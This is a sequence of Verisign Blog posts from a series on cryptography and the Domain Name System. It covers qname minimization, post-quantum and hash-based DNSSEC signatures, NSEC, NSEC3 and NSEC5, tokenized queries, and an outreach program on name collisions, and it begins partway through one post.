From a cryptographic perspective, the simpler approach would meet its goal: a relying party could then validate the response with the corresponding public key. However, the approach would introduce new operational risks, because the name server would now have to perform online cryptographic operations.
The name server would not only have to protect its private key from compromise, but would also have to protect the cryptographic operations from overuse by attackers. That could open another avenue for denial-of-service attacks that could prevent the name server from responding to legitimate requests.
The designers of DNSSEC mitigated these operational risks by developing NSEC and NSEC3, which gave the option of moving the private key and the cryptographic operations offline, into the name server’s provisioning system. Cryptography and operations were balanced by this better solution. The theme is now returning to view through the recent efforts around DNS encryption.
Like the simpler initial approach for authentication, DNS encryption may meet its goal from a cryptographic perspective. But the operational perspective is important as well. As designers again consider where and how to deploy private keys and cryptographic operations across the DNS ecosystem, alternatives with a better balance are a desirable goal.
In addition to encryption, there has been research into other, possibly lower-risk alternatives that can be used in place of or in addition to encryption at various levels of the DNS.
We call these techniques collectively minimization techniques.
In “textbook” DNS resolution, a resolver sends the same full domain name to a root server, a top-level domain (TLD) server, a second-level domain (SLD) server, and any other server in the chain of referrals, until it ultimately receives an authoritative answer to a DNS query.
This is the way that DNS resolution has been practiced for decades, and it’s also one of the reasons for the recent interest in protecting information on the resolver-to-authoritative exchange: The full domain name is more information than all but the last name server needs to know.
One such minimization technique, known as qname minimization, was identified by Verisign researchers in 2011 and documented in RFC 7816 in 2016. (In 2015, Verisign announced a royalty-free license to its qname minimization patents.)
With qname minimization, instead of sending the full domain name to each name server, the resolver sends only as much as the name server needs either to answer the query or to refer the resolver to a name server at the next level. This follows the principle of minimum disclosure: the resolver sends only as much information as the name server needs to “do its job.” As Matt Thomas described in his recent blog post on the topic, nearly half of all .com and .net queries received by Verisign’s .com TLD servers were in a minimized form as of August 2020.
Other techniques that are part of this new chapter in DNS protocol evolution include NXDOMAIN cut processing [RFC 8020] and aggressive DNSSEC caching [RFC 8198]. Both leverage information present in the DNS to reduce the amount and sensitivity of DNS information exchanged with authoritative name servers. In aggressive DNSSEC caching, for example, the resolver analyzes NSEC and NSEC3 range proofs obtained in response to previous queries to determine on its own whether a domain name doesn’t exist. This means that the resolver doesn’t always have to ask the authoritative server system about a domain name it hasn’t seen before.
All of these techniques, as well as additional minimization alternatives I haven’t mentioned, have one important common characteristic: they only change how the resolver operates during the resolver-authoritative exchange. They have no impact on the authoritative name server or on other parties during the exchange itself. They thereby mitigate disclosure risk while also minimizing operational risk.
The resolver’s exchanges with authoritative name servers, prior to minimization, were already relatively less sensitive because they represented aggregate interests of the resolver’s many clients1. Minimization techniques lower the sensitivity even further at the root and TLD levels: the resolver sends only its aggregate interests in TLDs to root servers, and only its interests in SLDs to TLD servers. The resolver still sends the aggregate interests in full domain names at the SLD level and below2, and may also include certain client-related information at these levels, such as the client-subnet extension. The lower levels therefore may have different protection objectives than the upper levels.
Minimization techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.
These tools complement those I’ve described in previous posts in this series. Some have already been deployed at scale, such as a DNSSEC with its NSEC and NSEC3 non-existence proofs. Others are at various earlier stages, like NSEC5 and tokenized queries, and still others contemplate “post-quantum” scenarios and how to address them. (And there are yet other tools that I haven’t covered in this series, such as authenticated resolution and adaptive resolution.)
Modern cryptography is just about as old as the DNS. Both have matured since their introduction in the late 1970s and early 1980s respectively. Both bring fundamental capabilities to our connected world. Both continue to evolve to support new applications and to meet new security objectives. While they’ve often moved forward separately, as this blog series has shown, there are also opportunities for them to advance together. I look forward to sharing more insights from Verisign’s research in future blog posts.
Read the complete six blog series:
1. This argument obviously holds more weight for large resolvers than for small ones — and doesn’t apply for the less common case of individual clients running their own resolvers. However, small resolvers and individual clients seeking additional protection retain the option of sending sensitive queries through a large, trusted resolver, or through a privacy-enhancing proxy. The focus in our discussion is primarily on large resolvers.
2. In namespaces where domain names are registered at the SLD level, i.e., under an effective TLD, the statements in this note about “root and TLD” and “SLD level and below” should be “root through effective TLD” and “below effective TLD level.” For simplicity, I’ve placed the “zone cut” between TLD and SLD in this note.
The post Information Protection for the Domain Name System: Encryption and Minimization appeared first on Verisign Blog.
This is the fifth in a multi-part series on cryptography and the Domain Name System (DNS).
In my last article, I described efforts underway to standardize new cryptographic algorithms that are designed to be less vulnerable to potential future advances in quantum computing. I also reviewed operational challenges to be considered when adding new algorithms to the DNS Security Extensions (DNSSEC).
In this post, I’ll look at hash-based signatures, a family of post-quantum algorithms that could be a good match for DNSSEC from the perspective of infrastructure stability.
I’ll also describe Verisign Labs research into a new concept called synthesized zone signing keys that could mitigate the impact of the large signature size for hash-based signatures, while still maintaining this family’s protections against quantum computing.
(Caveat: The concepts reviewed in this post are part of Verisign’s long-term research program and do not necessarily represent Verisign’s plans or positions on new products or services. Concepts developed in our research program may be subject to U.S. and/or international patents and/or patent applications.)
The DNS community’s root key signing key (KSK) rollover illustrates how complicated a change to DNSSEC infrastructure can be. Although successfully accomplished, this change was delayed by ICANN to ensure that enough resolvers had the public key required to validate signatures generated with the new root KSK private key.
Now imagine the complications if the DNS community also had to ensure that enough resolvers not only had a new key but also had a brand-new algorithm.
Imagine further what might happen if a weakness in this new algorithm were to be found after it was deployed. While there are procedures for emergency key rollovers, emergency algorithm rollovers would be more complicated, and perhaps controversial as well if a clear successor algorithm were not available.
I’m not suggesting that any of the post-quantum algorithms that might be standardized by NIST will be found to have a weakness. But confidence in cryptographic algorithms can be gained and lost over many years, sometimes decades.
From the perspective of infrastructure stability, therefore, it may make sense for DNSSEC to have a backup post-quantum algorithm built in from the start — one for which cryptographers already have significant confidence and experience. This algorithm might not be as efficient as other candidates, but there is less of a chance that it would ever need to be changed. This means that the more efficient candidates could be deployed in DNSSEC with the confidence that they have a stable fallback. It’s also important to keep in mind that the prospect of quantum computing is not the only reason system developers need to be considering new algorithms from time to time. As public-key cryptography pioneer Martin Hellman wisely cautioned, new classical (non-quantum) attacks could also emerge, whether or not a quantum computer is realized.
The 1970s were a foundational time for public-key cryptography, producing not only the RSA algorithm and the Diffie-Hellman algorithm (which also provided the basic model for elliptic curve cryptography), but also hash-based signatures, invented in 1979 by another public-key cryptography founder, Ralph Merkle.
Hash-based signatures are interesting because their security depends only on the security of an underlying hash function.
It turns out that hash functions, as a concept, hold up very well against quantum computing advances — much better than currently established public-key algorithms do.
This means that Merkle’s hash-based signatures, now more than 40 years old, can rightly be considered the oldest post-quantum digital signature algorithm.
If it turns out that an individual hash function doesn’t hold up — whether against a quantum computer or a classical computer — then the hash function itself can be replaced, as cryptographers have been doing for years. That will likely be easier than changing to an entirely different post-quantum algorithm, especially one that involves very different concepts.
The conceptual stability of hash-based signatures is a reason that interoperable specifications are already being developed for variants of Merkle’s original algorithm. Two approaches are described in RFC 8391, “XMSS: eXtended Merkle Signature Scheme” and RFC 8554, “Leighton-Micali Hash-Based Signatures.” Another approach, SPHINCS+, is an alternate in NIST’s post-quantum project.
Hash-based signatures can potentially be applied to any part of the DNSSEC trust chain. For example, in Figure 1, the DNS record sets can be signed with a zone signing key (ZSK) that employs a hash-based signature algorithm.
The main challenge with hash-based signatures is that the signature size is large, on the order of tens or even hundreds of thousands of bits. This is perhaps why they haven’t seen significant adoption in security protocols over the past four decades.
Verisign Labs has been exploring how to mitigate the size impact of hash-based signatures on DNSSEC, while still basing security on hash functions only in the interest of stable post-quantum protections.
One of the ideas we’ve come up with uses another of Merkle’s foundational contributions: Merkle trees.
Merkle trees authenticate multiple records by hashing them together in a tree structure. The records are the “leaves” of the tree. Pairs of leaves are hashed together to form a branch, then pairs of branches are hashed together to form a larger branch, and so on. The hash of the largest branches is the tree’s “root.” (This is a data-structure root, unrelated to the DNS root.)
Each individual leaf of a Merkle tree can be authenticated by retracing the “path” from the leaf to the root. The path consists of the hashes of each of the adjacent branches encountered along the way.
Authentication paths can be much shorter than typical hash-based signatures. For instance, with a tree depth of 20 and a 256-bit hash value, the authentication path for a leaf would only be 5,120 bits long, yet a single tree could authenticate more than a million leaves.
Returning to the example above, suppose that instead of signing each DNS record set with a hash-based signature, each record set were considered a leaf of a Merkle tree. Suppose further that the root of this tree were to be published as the ZSK public key (see Figure 2). The authentication path to the leaf could then serve as the record set’s signature.
The validation logic at a resolver would be the same as in ordinary DNSSEC:
The only difference on the resolver’s side would be that signature validation would involve retracing the authentication path to the ZSK public key, rather than a conventional signature validation operation.
The ZSK public key produced by the Merkle tree approach would be a “synthesized” public key, in that it is obtained from the records being signed. This is noteworthy from a cryptographer’s perspective, because the public key wouldn’t have a corresponding private key, yet the DNS records would still, in effect, be “signed by the ZSK!”
In this type of DNSSEC implementation, the Merkle tree approach only applies to the ZSK level. Hash-based signatures would still be applied at the KSK level, although their overhead would now be “amortized” across all records in the zone.
In addition, each new ZSK would need to be signed “on demand,” rather than in advance, as in current operational practice.
This leads to tradeoffs, such as how many changes to accumulate before constructing and publishing a new tree. Fewer changes and the tree will be available sooner. More changes and the tree will be larger, so the per-record overhead of the signatures at the KSK level will be lower.
My last few posts have discussed cryptographic techniques that could potentially be applied to the DNS in the long term — or that might not even be applied at all. In my next post, I’ll return to more conventional subjects, and explain how Verisign sees cryptography fitting into the DNS today, as well as some important non-cryptographic techniques that are part of our vision for a secure, stable and resilient DNS.
Read the complete six blog series:
The post Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys appeared first on Verisign Blog.
This is the fourth in a multi-part series on cryptography and the Domain Name System (DNS).
One of the “key” questions cryptographers have been asking for the past decade or more is what to do about the potential future development of a large-scale quantum computer.
If theory holds, a quantum computer could break established public-key algorithms including RSA and elliptic curve cryptography (ECC), building on Peter Shor’s groundbreaking result from 1994.
This prospect has motivated research into new so-called “post-quantum” algorithms that are less vulnerable to quantum computing advances. These algorithms, once standardized, may well be added into the Domain Name System Security Extensions (DNSSEC) — thus also adding another dimension to a cryptographer’s perspective on the DNS.
(Caveat: Once again, the concepts I’m discussing in this post are topics we’re studying in our long-term research program as we evaluate potential future applications of technology. They do not necessarily represent Verisign’s plans or position on possible new products or services.)
The National Institute of Standards and Technology (NIST) started a Post-Quantum Cryptography project in 2016 to “specify one or more additional unclassified, publicly disclosed digital signature, public-key encryption, and key-establishment algorithms that are capable of protecting sensitive government information well into the foreseeable future, including after the advent of quantum computers.”
Security protocols that NIST is targeting for these algorithms, according to its 2019 status report (Section 2.2.1), include: “Transport Layer Security (TLS), Secure Shell (SSH), Internet Key Exchange (IKE), Internet Protocol Security (IPsec), and Domain Name System Security Extensions (DNSSEC).”
The project is now in its third round, with seven finalists, including three digital signature algorithms, and eight alternates.
NIST’s project timeline anticipates that the draft standards for the new post-quantum algorithms will be available between 2022 and 2024.
It will likely take several additional years for standards bodies such as the Internet Engineering Task (IETF) to incorporate the new algorithms into security protocols. Broad deployments of the upgraded protocols will likely take several years more.
Post-quantum algorithms can therefore be considered a long-term issue, not a near-term one. However, as with other long-term research, it’s appropriate to draw attention to factors that need to be taken into account well ahead of time.
The three candidate digital signature algorithms in NIST’s third round have one common characteristic: all of them have a key size or signature size (or both) that is much larger than for current algorithms.
Key and signature sizes are important operational considerations for DNSSEC because most of the DNS traffic exchanged with authoritative data servers is sent and received via the User Datagram Protocol (UDP), which has a limited response size.
Response size concerns were evident during the expansion of the root zone signing key (ZSK) from 1024-bit to 2048-bit RSA in 2016, and in the rollover of the root key signing key (KSK) in 2018. In the latter case, although the signature and key sizes didn’t change, total response size was still an issue because responses during the rollover sometimes carried as many as four keys rather than the usual two.
Thanks to careful design and implementation, response sizes during these transitions generally stayed within typical UDP limits. Equally important, response sizes also appeared to have stayed within the Maximum Transmission Unit (MTU) of most networks involved, thereby also avoiding the risk of packet fragmentation. (You can check how well your network handles various DNSSEC response sizes with this tool developed by Verisign Labs.)
The larger sizes associated with certain post-quantum algorithms do not appear to be a significant issue either for TLS, according to one benchmarking study, or for public-key infrastructures, according to another report. However, a recently published study of post-quantum algorithms and DNSSEC observes that “DNSSEC is particularly challenging to transition” to the new algorithms.
Verisign Labs offers the following observations about DNSSEC-related queries that may help researchers to model DNSSEC impact:
A typical resolver that implements both DNSSEC validation and qname minimization will send a combination of queries to Verisign’s root and top-level domain (TLD) servers.
Because the resolver is a validating resolver, these queries will all have the “DNSSEC OK” bit set, indicating that the resolver wants the DNSSEC signatures on the records.
The content of typical responses by Verisign’s root and TLD servers to these queries are given in Table 1 below. (In the table, <SLD>.<TLD> are the final two labels of a domain name of interest, including the TLD and the second-level domain (SLD); record types involved include A, Name Server (NS), and DNSKEY.)
Name Server | Resolver Query Scenario | Typical Response Content from Verisign’s Servers |
Root | DNSKEY record set for root zone | • DNSKEY record set including root KSK RSA-2048 public key and root ZSK RSA-2048 public key • Root KSK RSA-2048 signature on DNSKEY record set |
A or NS record set for <TLD> — when <TLD> exists | • NS referral to <TLD> name server • DS record set for <TLD> zone • Root ZSK RSA-2048 signature on DS record set |
|
A or NS record set for <TLD> — when <TLD> doesn’t exist | • Up to two NSEC records for non-existence of <TLD> • Root ZSK RSA-2048 signatures on NSEC records |
|
.com / .net | DNSKEY record set for <TLD> zone | • DNSKEY record set including <TLD> KSK RSA-2048 public key and <TLD> ZSK RSA-1280 public key • <TLD> KSK RSA-2048 signature on DNSKEY record set |
A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> exists | • NS referral to <SLD>.<TLD> name server • DS record set for <SLD>.<TLD> zone (if <SLD>.<TLD> supports DNSSEC) • <TLD> ZSK RSA-1280 signature on DS record set (if present) |
|
A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> doesn’t exist | • Up to three NSEC3 records for non-existence of <SLD>.<TLD> • <TLD> ZSK RSA-1280 signatures on NSEC3 records |
For an A or NS query, the typical response, when the domain of interest exists, includes a referral to another name server. If the domain supports DNSSEC, the response also includes a set of Delegation Signer (DS) records providing the hashes of each of the referred zone’s KSKs — the next link in the DNSSEC trust chain. When the domain of interest doesn’t exist, the response includes one or more Next Secure (NSEC) or Next Secure 3 (NSEC3) records.
Researchers can estimate the effect of post-quantum algorithms on response size by replacing the sizes of the various RSA keys and signatures with those for their post-quantum counterparts. As discussed above, it is important to keep in mind that the number of keys returned may be larger during key rollovers.
Most of the queries from qname-minimizing, validating resolvers to the root and TLD name servers will be for A or NS records (the choice depends on the implementation of qname minimization, and has recently trended toward A). The signature size for a post-quantum algorithm, which affects all DNSSEC-related responses, will therefore generally have a much larger impact on average response size than will the key size, which affects only the DNSKEY responses.
Post-quantum algorithms are among the newest developments in cryptography. They add another dimension to a cryptographer’s perspective on the DNS because of the possibility that these algorithms, or other variants, may be added to DNSSEC in the long term.
In my next post, I’ll make the case for why the oldest post-quantum algorithm, hash-based signatures, could be a particularly good match for DNSSEC. I’ll also share the results of some research at Verisign Labs into how the large signature sizes of hash-based signatures could potentially be overcome.
Read the complete six blog series:
The post Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon appeared first on Verisign Blog.
A name collision occurs when a user attempts to resolve a domain in one namespace, but it unexpectedly resolves in a different namespace. Name collision issues in the public global Domain Name System (DNS) cause billions of unnecessary and potentially unsafe DNS queries every day. A targeted outreach program that Verisign started in March 2020 has remediated one billion queries per day to the A and J root name servers, via 46 collision strings. After contacting several national internet service providers (ISPs), the outreach effort grew to include large search engines, social media companies, networking equipment manufacturers, national CERTs, security trust groups, commercial DNS providers, and financial institutions.
While this unilateral outreach effort resulted in significant and successful name collision remediation, it is broader DNS community engagement, education, and participation that offers the potential to address many of the remaining name collision problems. Verisign hopes its successes will encourage participation by other organizations in similar positions in the DNS community.
Verisign is proud to be the operator for two of the world’s 13 authoritative root servers. Being a root server operator carries with it many operational responsibilities. Ensuring the security, stability and resiliency of the DNS requires proactive efforts so that attacks against the root name servers do not disrupt DNS resolution, as well as the monitoring of DNS resolution patterns for misconfigurations, signaling telemetry, and unexpected or unintended uses that, without closer collaboration, could have unforeseen consequences (e.g. Chromium’s impact on root DNS traffic).
Monitoring may require various forms of responsible disclosure or notification to the underlying parties. Further, monitoring the root server system poses logistical challenges because any outreach and remediation programs must work at internet scale, and because root operators have no direct relationship with many of the involved entities.
Despite these challenges, Verisign has conducted several successful internet-scale outreach efforts to address various issues we have observed in the DNS.
In response to the Internet Corporation for Assigned Names and Number (ICANN) proposal to mitigate name collision risks in 2013, Verisign conducted a focused study on the collision string .CBA. Our measurement study revealed evidence of a substantial internet-connected infrastructure in Japan that relied on the non-resolution of names that end in .CBA. Verisign informed the network operator, who subsequently reconfigured some of its internal systems, resulting in an immediate decline of queries for .CBA observed at A and J root servers.
Prior to the 2018 KSK rollover, several operators of DNSSEC-validating name servers appeared to be sending out-of-date RFC 8145 signals to root name servers. To ensure the KSK rollover did not disrupt internet name resolution functions for billions of end users, Verisign augmented ICANN’s outreach effort and conducted a multi-faceted technical outreach program by contacting and working with The United States Computer Emergency Readiness Team (US-CERT) and other national CERTs, industry partners, various DNS operator groups and performing direct outreach to out-of-date signalers. The ultimate success of the KSK rollover was due in large part to outreach efforts by ICANN and Verisign.
In response to the ICANN Board’s request in resolutions 2017.11.02.29 – 2017.11.02.31, the ICANN Security and Stability Advisory Committee (SSAC) was asked to conduct studies, and to present data and points of view on collision strings, including specific advice on three higher risk strings: .CORP, .HOME and .MAIL. While Verisign is actively engaged in this Name Collision Analysis Project (NCAP) developed by SSAC, we are also reviving and expanding our 2012 name collision outreach efforts.
Verisign’s name collision outreach program is based on the guidance we provided in several recent peer-reviewed name collision publications, which highlighted various name collision vulnerabilities and examined the root causes of leaked queries and made remediation recommendations. Verisign’s program uses A and J root name server traffic data to identify high-affinity strings related to particular networks, as well as high query volume strings that are contextually associated with device manufacturers, software, or platforms. We then attempt to contact the underlying parties and assist with remediation as appropriate.
While we partially rely on direct communication channel contact information, the key enabler of our outreach efforts has been Verisign’s relationships with the broader collective DNS community. Verisign’s active participation in various industry organizations within the ICANN and DNS communities, such as M3AAWG, FIRST, DNS-OARC, APWG, NANOG, RIPE NCC, APNIC, and IETF1, enables us to identify and communicate with a broad and diverse set of constituents. In many cases, participants operate infrastructure involved in name collisions. In others, they are able to put us in direct contact with the appropriate parties.
Through a combination of DNS traffic analysis and publicly accessible data, as well as the rolodexes of various industry partnerships, across 2020 we were able to achieve effective outreach to the anonymized entities listed in Table 1.
Organization | Queries per Day to A & J | Status | Number of Collision Strings (TLDs) | Notes / Root Cause Analysis |
Search Engine | 650M | Fixed | 1 string | Application not using FQDNs |
Telecommunications Provider | 250M | Fixed | N/A | Prefetching bug |
eCommerce Provider | 150M | Fixed | 25 strings | Application not using FQDNs |
Networking Manufacturer | 70M | Pending | 3 strings | Suffix search list |
Cloud Provider | 64M | Fixed | 15 strings | Suffix search list |
Telecommunications Provider | 60M | Fixed | 2 strings | Remediated through device vendor |
Networking Manufacturer | 45M | Pending | 2 strings | Suffix search list problem in router/modem device |
Financial Corporation | 35M | Fixed | 2 strings | Typo / misconfiguration |
Social Media Company | 30M | Pending | 9 strings | Application not using FQDNs |
ISP | 20M | Fixed | 1 string | Suffix search list problem in router/modem device |
Software Provider | 20M | Pending | 50+ strings | Acknowledged but still investigating |
ISP | 5M | Pending | 1 string | At time of writing, still investigating but confirmed it is a router/modem device |
Many of the name collision problems encountered are the result of misconfigurations and not using fully qualified domain names. After operators deploy patches to their environments, as shown in Figure 1 below, Verisign often observes an immediate and dramatic traffic decrease at A and J root name servers. Although several networking equipment vendors and ISPs acknowledge their name collision problems, the development and deployment of firmware to a large userbase will take time.
Cumulatively, the operators who have deployed patches constitute a reduction of one billion queries per day to A and J root servers (roughly 3% of total traffic). Although root traffic is not evenly distributed among the 13 authoritative servers, we expect a similar impact at the other 11, resulting in a system-wide reduction of approximately 6.5 billion queries per day.
As the ICANN community prepares for Subsequent Procedures (the introduction of additional new TLDs) and the SSAC NCAP continues to work to answer the ICANN Board’s questions, we encourage the community to participate in our efforts to address name collisions through active outreach efforts. We believe our efforts show how outreach can have significant impact to both parties and the broader community. Verisign is committed to addressing name collision problems and will continue executing the outreach program to help minimize the attack surface exposed by name collisions and to be a responsible and hygienic root operator.
For additional information about name collisions and how to properly manage private-use TLDs, please see visit ICANN’s Name Collision Resource & Information website.
1. The Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), Forum of Incident Response and Security Teams (FIRST), DNS Operations, Analysis, and Research Center (DNS-OARC), Anti-Phishing Working Group (APWG), North American Network Operators’ Group (NANOG), Réseaux IP Européens Network Coordination Centre (RIPE NCC), Asia Pacific Network Information Centre (APNIC), Internet Engineering Task Force (IETF)
The post Verisign Outreach Program Remediates Billions of Name Collision Queries appeared first on Verisign Blog.
This is the third in a multi-part blog series on cryptography and the Domain Name System (DNS).
In my last post, I looked at what happens when a DNS query renders a “negative” response – i.e., when a domain name doesn’t exist. I then examined two cryptographic approaches to handling negative responses: NSEC and NSEC3. In this post, I will examine a third approach, NSEC5, and a related concept that protects client information, tokenized queries.
The concepts I discuss below are topics we’ve studied in our long-term research program as we evaluate new technologies. They do not necessarily represent Verisign’s plans or position on a new product or service. Concepts developed in our research program may be subject to U.S. and international patents and patent applications.
NSEC5 is a result of research by cryptographers at Boston University and the Weizmann Institute. In this approach, which is still in an experimental stage, the endpoints are the outputs of a verifiable random function (VRF), a cryptographic primitive that has been gaining interest in recent years. NSEC5 is documented in an Internet Draft (currently expired) and in several research papers.
A VRF is like a hash function but with two important differences:
So, it’s not only hard for an adversary to reverse the VRF – which is also a property the hash function has – but it’s also hard for the adversary to compute the VRF in the forward direction, thus preventing dictionary attacks. And yet a relying party can still confirm that the VRF output for a given input is correct, because of the proof.
How does this work in practice? As in NSEC and NSEC3, range statements are prepared in advance and signed with the zone signing key (ZSK). With NSEC5, however, the range endpoints are two consecutive tokens.
When a domain name doesn’t exist, the name server applies the VRF to the domain name to obtain a token and a proof. The name sever then returns a range statement where the token falls within the range, as well as the proof, as shown in the figure below. Note that the token values are for illustration only.
Because the range statement reveals only tokenized versions of other domain names in a zone, an adversary who doesn’t know the private key doesn’t learn any new existing domain names from the response. Indeed, to find out which domain name corresponds to one of the tokenized endpoints, the adversary would need access to the VRF itself to see if a candidate domain name has a matching hash value, which would involve an online dictionary attack. This significantly reduces disclosure risk.
The name server needs a copy of the zone’s NSEC5 private key so that it can generate proofs for non-existent domain names. The ZSK itself can stay in the provisioning system. As the designers of NSEC5 have pointed out, if the NSEC5 private key does happen to be compromised, this only makes it possible to do a dictionary attack offline— not to generate signatures on new range statements, or on new positive responses.
NSEC5 is interesting from a cryptographer’s perspective because it uses a less common cryptographic technique, a VRF, to achieve a design goal that was at best partially met by previous approaches. As with other new technologies, DNS operators will need to consider whether NSEC5’s benefits are sufficient to justify its cost and complexity. Verisign doesn’t have any plans to implement NSEC5, as we consider NSEC and NSEC3 adequate for the name servers we currently operate. However, we will continue to track NSEC5 and related developments as part of our long-term research program.
A few years before NSEC5 was published, Verisign Labs had started some research on an opposite application of tokenization to the DNS, to protect a client’s information from disclosure.
In our approach, instead of asking the resolver “What is <name>’s IP address,” the client would ask “What is token 3141…’s IP address,” where 3141… is the tokenization of <name>.
(More precisely, the client would specify both the token and the parent zone that the token relates to, e.g., the TLD of the domain name. Only the portion of the domain name below the parent would be obscured, just as in NSEC5. I’ve omitted the zone information for simplicity in this discussion.)
Suppose now that the domain name corresponding to token 3141… does exist. Then the resolver would respond with the domain name’s IP address as usual, as shown in the next figure.
In this case, the resolver would know that the domain name associated with the token does exist, because it would have a mapping between the token and the DNS record, i.e., the IP address. Thus, the resolver would effectively “know” the domain name as well for practical purposes. (We’ve developed another approach that can protect both the domain name and the DNS record from disclosure to the resolver in this case, but that’s perhaps a topic for another post.)
Now, consider a domain name that doesn’t exist and suppose that its token is 2718… .
In this case, the resolver would respond that the domain name doesn’t exist, as usual, as shown below.
But because the domain name is tokenized and no other information about the domain name is returned, the resolver would only learn the token 2718… (and the parent zone), not the actual domain name that the client is interested in.
The resolver could potentially know that the name doesn’t exist via a range statement from the parent zone, as in NSEC5.
How does the client tokenize the domain name, if it doesn’t have the private key for the VRF? The name server would offer a public interface to the tokenization function. This can be done in what cryptographers call an “oblivious” VRF protocol, where the name server doesn’t see the actual domain name during the protocol, yet the client still gets the token.
To keep the resolver itself from using this interface to do an online dictionary attack that matches candidate domain names with tokens, the name server could rate-limit access, or restrict it only to authorized requesters.
Additional details on this technology may be found in U.S. Patent 9,202,079B2, entitled “Privacy preserving data querying,” and related patents.
It’s interesting from a cryptographer’s perspective that there’s a way for a client to find out whether a DNS record exists, without necessarily revealing the domain name of interest. However, as before, the benefits of this new technology will be weighed against its operational cost and complexity and compared to other approaches. Because this technique focuses on client-to-resolver interactions, it’s already one step removed from the name servers that Verisign currently operates, so it is not as relevant to our business today in a way it might have been when we started the research. This one will stay under our long-term tracking as well.
The examples I’ve shared in these last two blog posts make it clear that cryptography has the potential to bring interesting new capabilities to the DNS. While the particular examples I’ve shared here do not meet the criteria for our product roadmap, researching advances in cryptography and other techniques remains important because new events can sometimes change the calculus. That point will become even more evident in my next post, where I’ll consider the kinds of cryptography that may be needed in the event that one or more of today’s algorithms is compromised, possibly through the introduction of a quantum computer.
Read the complete six blog series:
The post Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries appeared first on Verisign Blog.
This is the second in a multi-part blog series on cryptography and the Domain Name System (DNS).
In my previous post, I described the first broad scale deployment of cryptography in the DNS, known as the Domain Name System Security Extensions (DNSSEC). I described how a name server can enable a requester to validate the correctness of a “positive” response to a query — when a queried domain name exists — by adding a digital signature to the DNS response returned.
The designers of DNSSEC, as well as academic researchers, have separately considered the answer of “negative” responses – when the domain name doesn’t exist. In this case, as I’ll explain, responding with a signed “does not exist” is not the best design. This makes the non-existence case interesting from a cryptographer’s perspective as well.
Consider a domain name like example.arpa that doesn’t exist.
If it did exist, then as I described in my previous post, the second-level domain (SLD) server for example.arpa would return a response signed by example.arpa’s zone signing key (ZSK).
So a first try for the case that the domain name doesn’t exist is for the SLD server to return the response “example.arpa doesn’t exist,” signed by example.arpa’s ZSK.
However, if example.arpa doesn’t exist, then example.arpa won’t have either an SLD server or a ZSK to sign with. So, this approach won’t work.
A second try is for the parent name server — the .arpa top-level domain (TLD) server in the example — to return the response “example.arpa doesn’t exist,” signed by the parent’s ZSK.
This could work if the .arpa DNS server knows the ZSK for .arpa. However, for security and performance reasons, the design preference for DNSSEC has been to keep private keys offline, within the zone’s provisioning system.
The provisioning system can precompute statements about domain names that do exist — but not about every possible individual domain name that doesn’t exist. So, this won’t work either, at least not for the servers that keep their private keys offline.
The third try is the design that DNSSEC settled on. The parent name server returns a “range statement,” previously signed with the ZSK, that states that there are no domain names in an ordered sequence between two “endpoints” where the endpoints depend on domain names that do exist. The range statements can therefore be signed offline, and yet the name server can still choose an appropriate signed response to return, based on the (non-existent) domain name in the query.
The DNS community has considered several approaches to constructing range statements, and they have varying cryptographic properties. Below I’ve described two such approaches. For simplicity, I’ve focused just on the basics in the discussion that follows. The astute reader will recognize that there are many more details involved both in the specification and the implementation of these techniques.
The first approach, called NSEC, involved no additional cryptography beyond the DNSSEC signature on the range statement. In NSEC, the endpoints are actual domain names that exist. NSEC stands for “Next Secure,” referring to the fact that the second endpoint in the range is the “next” existing domain name following the first endpoint.
The NSEC resource record is documented in one of the original DNSSEC specifications, RFC4033, which was co-authored by Verisign.
The .arpa zone implements NSEC. When the .arpa server receives the request “What is the IP address of example.arpa,” it returns the response “There are no names between e164.arpa and home.arpa.” This exchange is shown in the figure below and is analyzed in the associated DNSviz graph. (The response is accurate as of the writing of this post; it could be different in the future if names were added to or removed from the .arpa zone.)
NSEC has a side effect: responses immediately reveal unqueried domain names in the zone. Depending on the sensitivity of the zone, this may be undesirable from the perspective of the minimum disclosure principle.
A second approach, called NSEC3 reduces the disclosure risk somewhat by defining the endpoints as hashes of existing domain names. (NSEC3 is documented in RFC 5155, which was also co-authored by Verisign.)
An example of NSEC3 can be seen with example.name, another domain that doesn’t exist. Here, the .name TLD server returns a range statement that “There are no domain names with hashes between 5SU9… and 5T48…”. Because the hash of example.name is “5SVV…” the response implies that “example.name” doesn’t exist.
This statement is shown in the figure below and in another DNSviz graph. (As above, the actual response could change if the .name zone changes.)
To find out which domain name corresponds to one of the hashed endpoints, an adversary would have to do a trial-and-error or “dictionary” attack across multiple guesses of domain names, to see if any has a matching hash value. Such a search could be performed “offline,” i.e., without further interaction with the name server, which is why the disclosure risk is only somewhat reduced.
NSEC and NSEC3 are mutually exclusive. Nearly all TLDs, including all TLDs operated by Verisign, implement NSEC3. In addition to .arpa, the root zone also implements NSEC.
In my next post, I’ll describe NSEC5, an approach still in the experimental stage, that replaces the hash function in NSEC3 with a verifiable random function (VRF) to protect against offline dictionary attacks. I’ll also share some research Verisign Labs has done on a complementary approach that helps protect a client’s queries for non-existent domain names from disclosure.
Read the complete six blog series:
The post Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3 appeared first on Verisign Blog.